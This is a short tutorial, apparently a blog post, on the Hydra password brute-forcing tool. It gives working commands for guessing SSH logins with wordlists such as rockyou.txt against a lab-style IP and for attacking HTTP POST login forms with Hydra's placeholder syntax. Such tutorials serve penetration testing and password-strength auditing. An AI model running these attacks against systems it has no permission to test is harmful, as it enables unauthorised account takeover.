What is it?
when you want to buteforce an online service – hydra is one of the go to tools.
It supports a wide spectrum of services: ssh, mysql, ftp http-forms and many more.
You can use wordlists for both usernames and passwords or you can use the bruteforce feature.
Using wordlists is usually the way to go.
If you provide the -h switch for help you get – among the complete list of features and options – a list of supported services:
adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
So – very versatile.
Lets start with an easy example:
SSH
Since ssh is the usul remote adminstration interface it’s a good practice to test password strength based on wordlists.
The syntax couldn’t be simpler:
hydra -l <username> -P <wordlist> ssh://<hostname>
-l stands for the username and -p for the password. You can use both in lower and upper case form. Lowercase stands for a single username or password where the capital versions of the two switches indicte that you provide a wordlist.
So this means
hydra -l john -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.25
So we are trying to guess john’s (lowercase -l) password from the rockyou list (upper case -P)
Service is ssh and lastly we have the ip. Simple as that.
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.25
Here we provide a lsit for both username and password.
If you have a file with the usernames and passwords organized like this
<username>:<password>
You can use the -C switch
You get the idea – as simple as it is powerful
HTTP(S)
Most of the services work like ssh. for FTP for example you just put ftp instead of ssh and it works the same way.
For http things get a little more complicated.
One option is we have an html form.
Something like this
<form id="login" method="post" action="login">
<input type="text" name="user" id="Uname" placeholder="Username">
<input type="Password" name="pass" id="Pass" placeholder="Password">
</form>
Then our command would look like this
hydra -l <user> -P <wordlist> 10.10.10.25 http-post-form "/login:user=^USER^&pass=^PASS^:failed"
The first part is pretty obvious by now: We have the user, password and host.
After that we tell hydra that we want to attack an HTML form that uses the POST method.
The last parameter has 3 parts seperated by a colon:
"/login:user=^USER^&pass=^PASS^:failed"
The first part /login is the URL we want to call with the POST request
Then comes the HTTP POST body. You find user and pass as the parameter names in the HTML form.
^USER^ and ^PASS^ are placeholders that hydra wil replace with the usernames and passwords we provided in the first part of the command.
The last part failed is an indicator for hydra that tells her that the login wasn’t successful.
Now hydra has everything she needs:
What request to make to what server, the URL to call, the parameters to send and how to understand wether a login was successful or not.
